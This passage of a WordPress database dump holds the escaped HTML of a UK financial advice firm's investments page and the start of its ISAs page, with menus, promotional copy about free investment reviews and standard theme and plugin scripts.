OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									&#13;\n				<!-- START REVOLUTION SLIDER 3.0.95 fullwidth mode -->&#13;\n				&#13;\n								&#13;\n								<div id=\"rev_slider_31_1_wrapper\" class=\"rev_slider_wrapper fullwidthbanner-container\" style=\"margin:0px auto;background-color:#E9E9E9;padding:0px;margin-top:0px;margin-bottom:0px;max-height:375px;\">&#13;\n					<div id=\"rev_slider_31_1\" class=\"rev_slider fullwidthabanner\" style=\"display:none;max-height:375px;height:375;\">						&#13;\n										<ul><li data-transition=\"fade\" data-slotamount=\"7\">&#13;\n						&#13;\n														<div class=\"tp-caption large_text sfb\" data-x=\"540\" data-y=\"67\" data-speed=\"750\" data-start=\"0\" data-easing=\"easeOutExpo\">Investments					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption small_text lfb\" data-x=\"538\" data-y=\"113\" data-speed=\"750\" data-start=\"0\" data-easing=\"easeOutExpo\">There\'s no shortage of ways to manage and grow <br/>your wealth. That\'s why we allocate every client their<br/> own dedicated wealth planner who will help you navigate<br/> the complex financial landscape to reach your goals.&#13;\n&#13;\n					 					 </div>&#13;\n				&#13;\n								<div class=\"tp-caption alt1 sfb\" data-x=\"537\" data-y=\"218\" data-speed=\"750\" data-start=\"0\" data-easing=\"easeOutExpo\"><a href=\"../contact-us/\" class=\"button large green\">Get Advice Today!</a>					 					 </div>&#13;\n				&#13;\n									</li>&#13;\n								</ul></div>&#13;\n				</div>				&#13;\n							&#13;\n			<script type=\"text/javascript\"><![CDATA[\r\n\r\n				var tpj=jQuery;\r\n				\r\n									tpj.noConflict();\r\n								\r\n				var revapi31;\r\n				\r\n				tpj(document).ready(function() {\r\n				\r\n				if (tpj.fn.cssOriginal != undefined)\r\n					tpj.fn.css = tpj.fn.cssOriginal;\r\n				\r\n				if(tpj(\'#rev_slider_31_1\').revolution == undefined)\r\n					revslider_showDoubleJqueryError(\'#rev_slider_31_1\');\r\n				else\r\n				   revapi31 = tpj(\'#rev_slider_31_1\').show().revolution(\r\n					{\r\n						delay:9000,\r\n						startwidth:960,\r\n						startheight:375,\r\n						hideThumbs:200,\r\n						\r\n						thumbWidth:100,\r\n						thumbHeight:50,\r\n						thumbAmount:1,\r\n						\r\n						navigationType:\"bullet\",\r\n						navigationArrows:\"solo\",\r\n						navigationStyle:\"round\",\r\n						\r\n						touchenabled:\"on\",\r\n						onHoverStop:\"on\",\r\n						\r\n						navigationHAlign:\"center\",\r\n						navigationVAlign:\"bottom\",\r\n						navigationHOffset:0,\r\n						navigationVOffset:20,\r\n\r\n						soloArrowLeftHalign:\"left\",\r\n						soloArrowLeftValign:\"center\",\r\n						soloArrowLeftHOffset:20,\r\n						soloArrowLeftVOffset:0,\r\n\r\n						soloArrowRightHalign:\"right\",\r\n						soloArrowRightValign:\"center\",\r\n						soloArrowRightHOffset:20,\r\n						soloArrowRightVOffset:0,\r\n								\r\n						shadow:0,\r\n						fullWidth:\"on\",\r\n						fullScreen:\"off\",\r\n\r\n						stopLoop:\"off\",\r\n						stopAfterLoops:-1,\r\n						stopAtSlide:-1,\r\n\r\n						shuffle:\"off\",\r\n						\r\n						hideSliderAtLimit:0,\r\n						hideCaptionAtLimit:0,\r\n						hideAllCaptionAtLilmit:0,\r\n						startWithSlide:0,\r\n						videoJsPath:\"http://www.equalitywalk.org.uk/wp-content/plugins/revslider/rs-plugin/videojs/\",\r\n						fullScreenOffsetContainer: \"\"	\r\n					});\r\n				\r\n				});	//ready\r\n				\r\n			]]></script><!-- END REVOLUTION SLIDER --></div>&#13;\n																<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-28\" class=\"post-28 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Investments</span>&#13;\n			<span class=\"updated\" style=\"display: none;\">June 12th, 2017</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"one_half\"><style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>High Performing Investment Advice</h2><p/>&#13;\n<p>We believe in a “Grow Rich Slowly” philosophy to investments through a diversified approach to purchasing investments. This we believe is the right choice for the majority of investors who are seeking more peace of mind, when looking to achieve sustained performance over the longer term</p>&#13;\n<p> </p>&#13;\n<p><b>We will review your current investments and options at no initial cost</b></p>&#13;\n<p> </p>&#13;\n<p>We will provide a review of your current circumstances and goals for investing including an analysis of attitude to risk, if you have investments currently in place, then we will analyse past performance and the future projections. We will explain how your investments are working towards your chosen goals including the impact of charges and any special benefits if available.</p>&#13;\n<p> </p>&#13;\n<p>We will offer our recommendations if we feel that anything can be improved upon.</p>&#13;\n<p> </p>&#13;\n<p>Simply request your FREE Investment Review with a Equity SMART expert today by clicking on the get a investment review button to get started.</p>&#13;\n<p/></section></div></div><div class=\"one_half last\"> <div class=\"accordian\"><h5 class=\"toggle active\"><a href=\"#\"><span class=\"arrow\"/>What to Expect From Your Investment Review:</a></h5><div class=\"toggle-content default-open\" style=\"display: block;\">&#13;\n<ul><li>We offer whole of market advice offering truly independent financial advice.</li>&#13;\n<li>No upfront advice charging or any hidden fees and costs.</li>&#13;\n<li>Bespoke portfolio – matched to your investment requirements and individual needs.</li>&#13;\n<li>Annual or more regular reviews – to keep your investment on track, grow and meet your savings goals.</li>&#13;\n<li>You’ll feel safe in the knowledge that your savings needs are all being expertly handled by real people who care</li>&#13;\n</ul><p/></div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>2o Years Established - That Counts in Investment Planning</a></h5><div class=\"toggle-content \" style=\"\">This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. </div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Promise</a></h5><div class=\"toggle-content \" style=\"\">We stand for honesty – advice – trust and value. Our culture and people matter regarding what you can expect from us. We promise you this the team that makes Equity SMART work will be centred on you. We believe in treating clients like family, so you can be confident that we’ll give you the same advice we would give to our own relatives.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Who We Help:</a></h5><div class=\"toggle-content \" style=\"\">&#13;\n<p>We are committed to those who are serious about growing and preserving their wealth, whether you are risk adverse, relatively cautious or more optimistic and can cope with fluctuations in your investment portfolio to seek higher returns.</p>&#13;\n<p/></div></div>&#13;\n<p style=\"text-align: center;\"/><div class=\"demo-sep sep-none\" style=\"margin-top:18px;\"/><a class=\"button large e.g. green\" href=\"#standard\" target=\"\">Get Your Pension Review</a></div><div class=\"clearboth\"/>&#13;\n<p style=\"text-align: center;\"><big><big><big>Investments &amp; Investment Planning</big></big></big></p>&#13;\n<p style=\"text-align: center;\">Select the area of  investment planning that you are interested in:</p>&#13;\n<p style=\"text-align: center;\"/><div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px\"/>&#13;\n<div class=\"one_third\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#imageframe-1.imageframe{float:left;}\r\n	#imageframe-1.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-1.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-1.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-1\" class=\"imageframe imageframe-none\"><a href=\"..lump-sum-investment/\"/></span>&#13;\n<h2>Lump Sum Investment</h2>&#13;\n<p>Finding yourself with a large sum investment or some spare money can be a fortunate experience, but what do you do with it? <a href=\"..lump-sum-investment/\">…find out more…</a></p>&#13;\n</div>&#13;\n<div class=\"one_third\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#imageframe-2.imageframe{float:left;}\r\n	#imageframe-2.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-2.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-2.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-2\" class=\"imageframe imageframe-none\"><a href=\"..isas/\"/></span>&#13;\n<h2>Individual Savings Accounts (ISAs)</h2>&#13;\n<p>Choose from a range of cash or Invest in Stocks and Shares in tax-efficient way by taking out an Individual Savings Account. We make tax-efficient saving easy to ensure you don’t lose <a href=\"..isas/\">…find out more…</a></p>&#13;\n</div>&#13;\n<div class=\"one_third last\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#imageframe-3.imageframe{float:left;}\r\n	#imageframe-3.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-3.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-3.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-3\" class=\"imageframe imageframe-none\"><a href=\"..offshore-bonds/\"/></span>&#13;\n<h2>Offshore Bonds</h2>&#13;\n<p>We’ll help dispel the myth that offshore bonds are only suitable for wealthy clients, and how recent reforms are opening up this flexible investment opportunity to a whole new<a href=\"..offshore-bonds/\">…find out more…</a></p>&#13;\n</div><div class=\"clearboth\"/>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-2 .tagline-shadow:before,#reading-box-container-2 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-2\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f4f4f4 !important;border-width:1px;border-color:#fafafa!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>It’s all so simple. To book a chat with our independent financial advisors.</h2><p>It\'s free, without obligation and impartial click the link or call free on .</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div>&#13;\n<script type=\"mce-text/javascript\"><![CDATA[// <![CDATA[\r\njQuery(document).ready(function ($) {     $(\'a[href=\"#standard\"]\').click(function () {         $(\'.iphorm-fancybox-link\').click();         return false;     }); });\r\n// ]]&gt;]]></script></div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"http://www.equalitywalk.org.uk/portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/11/cats-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cats\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/cric-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cric\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/auto-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"auto\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/investing-income/\" title=\"Investing For Income\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/investing-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"investing\"/></a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://www.equalitywalk.org.uk/feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	&#13;\n	<!-- W3TC-include-js-head -->&#13;\n&#13;\n	&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Investments from Equity SMART','Equity SMART provide a wide range of investment and wealth management solutions for select UK clients. Find out more.','publish','closed','closed','','investments-from-equity-smart','','','2017-09-21 16:34:33','2017-09-21 16:34:33','',0,'http://www.equalitywalk.org.uk/investments-from-equity-smart',0,'page','',0),(76,1,'2017-09-21 16:34:33','2017-09-21 16:34:33','<body class=\"page page-id-119 page-child parent-pageid-28 page-template page-template-100-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-119 current_page_item menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										ISAs										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/investments\" title=\"Investments\">Investments</a></li><li>ISAs</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div 